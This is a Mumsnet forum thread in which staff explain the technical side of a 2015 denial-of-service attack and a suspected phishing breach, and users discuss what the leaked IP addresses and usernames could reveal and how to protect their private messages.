More about the Technical side of the attacks on Mumsnet

[JustineMumsnet]

Hi all,
There are have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kind of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to either redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the later. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it so we don't want to rush and end up creating bigger holes but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

I do think the chances of somebody

• Knowing about the hack and seeking out the list
• Knowing that you are a mumsnetter and wanting to know what your username is
• Knowing your IP address
• Knowing how to put those together to search
• Being totally unfamiliar with mumsnet yet immediately working out the search options
• Finding anything useful after searching, given that AS only returns 500 results maximum, and most of us post a load of boring arbitrary shit like how often you wash your towels and advice on the best texture of mashed carrot for a baby and "that made me spit tea on my keyboard" in far higher numbers than anything juicy

Are really, really low.

They'd have to be really very keen to look SouthAmericanCuisine and they'd have to make suppositions, as in they couldn't definitively prove it was you, but I suppose they could surmise from details in posts.

IP addresses are as I am sure you already know dynamically assigned, although in reality they tend to last months if you always leave your router on.

If you find out the IP address you are currently using, you can check if it is the same as the one linked to your username on the list. How depends on the type of computer you're using (you can Google how to do it, it's not too complicated). Don't tell us what type of computer you're using. Just in case, like :).

SouthAmericanCuisine
If someone knows your IP address
And sees it on the list linked to a specific username
then yes definitely - they would know that the username had been on that IP address when phished - and by assumption it is likely that the username was you...

however, most people have no idea what their IP address is at any time (your boss might if from work and a fixed IP address - but then it could be any person at work posting, though content might give it away...) It is why I recommended early on that if worried users should turn off and turn back on their routers to pick up a new IP address to help reduce any matching...

why would your DC / spouse know the IP - they might, but in most families they won't - this is the IP of you on broadband given to you by your broadband supplier while on their network and only seen generally by servers - not your internal IP of your device... very different things...

as to MNHQ deleting posting histories - I doubt they will do it generally, posts are public and to remove them would be to make it difficult to read threads, if someone has posted identifying information then it could be tracked even without knowing usernames etc. However if there is a reason they might - always worth asking them if concerned...

kleptronic
IP address in this context is totally separate to type of computer :)
go to: ip-lookup.net/ and it will show you your broadband IP - which is all that is seen online...

the IP relating to your computer / device is its IP on the internal network - usually assigned by the router - you have two networks, internal and the world... the router bridges them and hides the internal from the world, and allows the world through to the internal...

so this list had the broadband IP address, and has no idea what computer you are on or whether your internal IP is 192.168.0.1 or 192.168.0.20 (internal usually starts 192.168)

You are so right akkakk I was thinking like I was in work, doh!

I really don't think anyone should be worried about IP addresses - as previous posters have said the chances that most people will be identified from that alone are virtually zero. My only worry would be that if they have people's email addresses, it's not impossible that those might be published alongside usernames at a later date. Again, though, as BertieBotts says, someone would have to know about the hack, find the list, search for your email specifically, trawl through all your posts looking for anything interesting... It's way too much effort for the average nosy person, I'd only be worried if you already have a stalker/vindictive ex etc or if you've posted anything that might completely ruin your life it if came to light.

Question for MNHQ/tech - as you (presumably!) don't own the phishing site the answer is probably no, but having found the problem, do you have any idea how many users are likely to have been affected?

I'm sure people have asked already but what about the home addresses given to MN for product trials etc?

My IP address appears to be the corner of someone's back yard some miles away from me. I'm not greatly concerned by its publication.

I'm sure MN said they keep those totally separately Bettybooby.

My IP address has me right in the middle of a very large Methodist church. I'm not a Methodist.

Mine's 60 miles away Either the geolocation services are only getting Sky's switch point, or GCHQ's rerouting all my activity. I'd like to think they care that much, but suspect it's the former.

I check this quite often - it's only been correct once, and down to 20 miles away a few times. For a while I appeared to be in Germany. I mean, the cops would be able to find me from my IP but they have to have a special kind of warrant to force Sky to hand over the information.

^^ Shiny Dave wants ISPs to have to give this info without the formal stuff. I'm not up to date with how that's going.

In more interesting hacker news, the Ashley Madison data has now been dumped in full. It's enormous, and just a dump, so needs a lot of processing. People are processing it, of course, and I'm sure you could find someone to search for your loved one for a fee.

I'm not a Methodist. Your router disapproves of drinking & swearing, though.

Mine shows my country and ISP correctly, that's it. When I turn my VPN on it goes haywire.

Please could MNHQ ask all users to delete PMs from their inbox? Many of us use the PM function to exchange addresses, tel. nos, more personal details, etc. We can delete our own PMs but the recipients need to delete theirs too.

I just deleted all inbox posts with some regret .

Anything posted online in any forum or via email should be thought of as being written on the back of a post card. The internet really is just not that secure.

cats I tend to agree, but the annonymity of MN has been perpetuated over the years through the site "rules" - such as HQ being willing to delete posting histories if a person has been "outed" in RL. It gives the impression that our identities are secure, and it has encouraged us to believe that anonymity is the norm, here.

cats - agree.

And that also touches on the myth of any part of MN being a 'safe space'.

I changed my password as requested last night.

The reset page contained a spelling error, however.

Is this just a mistake made in haste - it feels like one of those things we're supposed to be on guard for.

Is therexany sign of the delete all for PMs?

I need to delete not only all my received, but sent also.

There's a 'select all' button at the top of inbox and outbox.

Clicking then selects all on that page and you then click the dustbin to delete. Repeat for each page.

Ah is that desktop only? Not seeing it on mobile.

Have sent a delete request anyway as I need deletion from other users inboxes too.

I have seen I am on that list with my old user name I am concerned as to how they manage to get my password as I haven't used it for ages as mumsnet was always logged on I cannot remember the last time I had to log on to get on to mumsnet, I have now deleted that account and set up a new one

www.urbandictionary.com/define.php?term=doxing his latest threat

@RustyParker

I'm not on the list but just remembered that a couple of days ago I had a notification from Facebook saying someone had requested a reset of my FB password. Could this be linked?

Hi RustyParker - we can't say for sure if this is linked. The best thing to do is just ignore and delete these emails. If you are concerned, you can change your email and password on your Facebook account to be sure and to stop the emails coming through.